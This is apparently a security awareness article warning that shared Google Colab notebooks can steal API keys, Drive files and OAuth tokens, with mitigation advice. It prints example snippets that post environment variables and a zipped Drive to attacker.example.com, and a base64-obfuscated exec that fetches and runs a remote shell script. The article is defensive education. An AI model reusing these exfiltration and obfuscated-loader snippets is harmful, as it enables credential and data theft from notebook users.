You find a tutorial on Reddit. Someone solved the exact problem you’ve been stuck on. There’s a Google Colab link. You click it, hit Run All, and wait for the output.

That’s it. That’s the attack.

TL;DR

  • Google Colab notebooks run with access to your Google account, Drive, and any credentials stored in the session
  • A single Run All click on an unreviewed notebook can exfiltrate your API keys, files, and OAuth tokens
  • NVIDIA’s AI Red Team found 140+ active credentials hardcoded in Kaggle notebooks shared publicly
  • Malicious notebooks can abuse Google’s trusted IP range to bypass firewalls and run as command-and-control servers
  • Mitigation is simple: never run a notebook you haven’t read, and use a dedicated throwaway Google account for testing

Why This Matters to You

Google Colab has tens of millions of users. It’s the go-to environment for data science, machine learning research, AI tutorials, and academic coursework. Notebooks are shared constantly — on GitHub, Kaggle, Reddit, Discord, and alongside research papers.

The vast majority of those users run shared notebooks without reading the code. That’s not a character flaw — it’s the culture. The implicit assumption is that because it’s running on Google’s infrastructure, it must be safe.

That assumption is wrong, and this article explains exactly why.


What Google Colab Actually Is

Think of Colab as a rented computer that Google gives you for free. You get a Linux machine with a GPU, Python pre-installed, and direct access to your Google account. When you open a notebook and click Run All, you’re executing code on that machine — as root.

The key word is access. When you use Colab, the session has:

  • Access to your Google Drive (if you mount it)
  • A valid Google OAuth token linked to your account
  • Access to any environment variables you set, including API keys
  • Root privileges on the temporary compute instance
  • The ability to install any software via pip or apt
  • Network access to send data anywhere on the internet

This is a powerful environment. That’s exactly what makes it dangerous when the code inside isn’t yours.


The Attack Vectors

1. Stealing API Keys and Environment Variables

The most common attack is the simplest. Researchers and developers often store API keys as environment variables in their Colab session — for OpenAI, HuggingFace, AWS, GitHub, and dozens of other services.

A malicious notebook can silently collect all of them in seconds:

import os, requests
# Grab every environment variable and send it to attacker's server
env_data = dict(os.environ)
requests.post("https://attacker.example.com/collect", json=env_data, timeout=5)

This runs invisibly. No error, no warning, no indication anything happened. The output cell stays empty while your credentials are already in someone else’s database.

NVIDIA’s AI Red Team made this concrete in 2024. They analyzed 3.5 million Python files and Jupyter notebooks from the Meta Kaggle for Code dataset and found over 140 unique active credentials hardcoded in publicly shared notebooks — API keys for OpenAI, AWS, and GitHub, sitting in plaintext for anyone to find and use.

2. Google Drive Exfiltration

Many Colab workflows start with mounting Google Drive:

from google.colab import drive
drive.mount('/content/drive')

Once mounted, the notebook has read access to your entire Drive. Documents, spreadsheets, credentials files, private research data — all of it becomes accessible. A malicious notebook can compress and upload your Drive contents to an external server without triggering any alerts:

import shutil, requests
# Archive entire Drive
shutil.make_archive('/tmp/drive_backup', 'zip', '/content/drive/MyDrive')
# Upload to attacker server
with open('/tmp/drive_backup.zip', 'rb') as f:
requests.post("https://attacker.example.com/upload", files={'file': f})

The entire operation takes less than a minute for most users’ data.

3. Google OAuth Token Theft

This is the most serious vector. When you open Colab, Google issues an OAuth token to your session — a temporary credential that proves you are you, linked to your full Google account. This token can be extracted from the session and used to access your Gmail, Calendar, Drive, and other Google services.

Google considers this acceptable behavior from within the Colab environment. It’s “working as intended.” But it means that code running in your Colab session can act on your behalf across your entire Google account, at least until the token expires.

4. Obfuscated Code

Malicious code doesn’t always look malicious. Python makes it trivial to hide what code actually does:

# This runs arbitrary code — the actual payload is base64-encoded
import base64
exec(base64.b64decode(
"aW1wb3J0IHN1YnByb2Nlc3MKc3VicHJvY2Vzcy5ydW4oJ2N1cmwgaHR0cHM6Ly9hdHRhY2tlci5leGFtcGxlLmNvbS9zdGFnZTIuc2ggfCBiYXNoJywgc2hlbGw9VHJ1ZSk="
))

To a casual reader, this looks like a harmless import and a long string. Decode that base64 and you get a command that fetches and executes a shell script from an external server.

Variants include multi-level encoding, splitting the payload across multiple cells, using innocuous variable names, and hiding execution inside helper functions called at the end of the notebook. None of these are detectable without carefully reading every line of code.

5. Malicious pip Packages

Colab notebooks frequently install packages:

!pip install totally-legitimate-ml-library

Typosquatting — registering packages with names nearly identical to popular ones — is a known and growing problem. Malicious packages up 37% in open source ecosystems between 2024 and 2025, according to Kaspersky. A notebook that installs scikit-leam instead of scikit-learn, or numpy-ml instead of a known package, can execute attacker code before any notebook cell even runs.

Supply chain attacks through PyPI have affected packages with millions of downloads. Colab’s “install and run” workflow makes users uniquely vulnerable because there’s no review step — the install happens as part of running the notebook.

6. Using Google as a Command-and-Control Server

This one was published as a “Won’t Fix” vulnerability by Google. Because Colab runs on Google’s infrastructure, all traffic from the session originates from Google’s IP addresses — addresses that are trusted by most firewalls, content filters, and security tools.

Security researcher 4n7m4n demonstrated that Colab can be weaponized as a command-and-control (C2) server: a persistent connection between the attacker and a compromised machine, routed through Google’s trusted infrastructure. Persistent reverse shells remain active even after the standard session ends, using a zombie process technique that survives Colab’s cleanup mechanisms.

From a blue team perspective, traffic from Google’s IP ranges to internal systems rarely raises alarms. That’s what makes this dangerous.


Who Is Actually at Risk

The population of Colab users is enormous and spans a wide trust spectrum:

Students and hobbyists follow YouTube tutorials and blog posts. The culture is “click and run.” Security review isn’t part of the workflow.

Kaggle competitors share and copy notebooks rapidly, optimizing for leaderboard performance rather than code hygiene. Many have HuggingFace, Kaggle, and OpenAI tokens loaded in their sessions.

Academic researchers replicate results from papers by running the accompanying GitHub code. The assumption is that peer-reviewed research code is safe — but paper code often goes through no security review at all.

Data scientists in organizations sometimes use personal Colab accounts for quick analysis, inadvertently loading work credentials or accessing Drive files that contain sensitive organizational data.

The unifying factor: the more you trust the source (a famous researcher, a top Kaggle competitor, an official-looking tutorial), the less likely you are to read the code before running it.


What You Can Do Today

1. Always Read the Notebook First

This sounds obvious, but it’s not common practice. Before clicking Run All, scroll through every cell. Look specifically for:

  • exec(), eval(), __import__()
  • base64.b64decode()
  • subprocess, os.system(), os.popen()
  • requests.post() or any HTTP calls to unfamiliar URLs
  • Pip installs of packages you don’t recognize

You don’t need to understand every line — you need to identify suspicious patterns.

2. Use a Throwaway Google Account

Create a dedicated Google account for testing untrusted notebooks. It should have:

  • No connected Drive with real data
  • No active Google Workspace access
  • No API keys or credentials loaded

If something goes wrong, the blast radius is zero. This is the single highest-impact mitigation.

3. Don’t Mount Your Drive in Untrusted Notebooks

If a notebook you didn’t write asks you to mount your Drive, ask yourself why. Most computational tasks don’t require Drive access. Decline the mount or don’t run the notebook at all.

4. Don’t Load Credentials Before Reviewing Code

A common workflow is to set up API keys at the top of a session, then run a community notebook. Reverse that order: review the notebook first, then — only if you trust it — add credentials.

5. Verify pip Package Names

Before running a pip install, check the package name against PyPI. Look for the official page, check the download count, and verify the author. A package with 3 downloads from an account created last week should not be running on your machine.

6. Use Colab’s Built-in Secrets Manager

Google added a Secrets panel to Colab (the key icon in the sidebar). It allows you to store API keys that notebooks can access only if you explicitly grant permission per-notebook, per-session. This is significantly safer than pasting keys into cells or loading them from Drive.


The Bigger Picture

Google Colab is a remarkable tool. Free GPU access, zero setup, shareable notebooks — it lowered the barrier to machine learning research dramatically. That accessibility is genuinely valuable.

But accessibility and security are in tension. The same frictionlessness that makes Colab great for learning makes it dangerous when code review is skipped. The NVIDIA research finding 140+ live credentials in public Kaggle notebooks wasn’t a hypothetical — those were real keys that real attackers could use right now.

The fix isn’t to stop using Colab. It’s to treat a Colab notebook like you’d treat any code you didn’t write: with a quick review before you give it the keys to your house.

MITRE ATT&CK maps this threat under Unsecured Credentials (T1552) for credential exposure and Command and Scripting Interpreter: Python (T1059.006) for execution via notebooks.



Sources